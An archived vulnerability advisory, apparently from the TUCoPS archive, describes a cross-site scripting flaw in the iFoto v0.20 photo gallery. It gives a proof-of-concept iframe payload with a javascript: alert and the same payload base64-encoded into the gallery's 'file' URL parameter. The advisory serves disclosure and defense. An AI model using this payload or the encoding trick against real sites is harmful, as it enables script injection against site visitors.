TUCoPS :: HP Unsorted I :: b06-2844.htm

Ifoto v0.20-06/06/06
iFoto v0.20-06/06/06
iFoto v0.20-06/06/06


iFoto v0.20-06/06/06=0D
=0D
Homepage:=0D
http://ifoto.ireans.com/=0D 
=0D
Effected files:=0D
=0D
XSS Vulnerability:=0D
=0D
The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64.=0D
=0D
The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME]=0D
=0D
http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH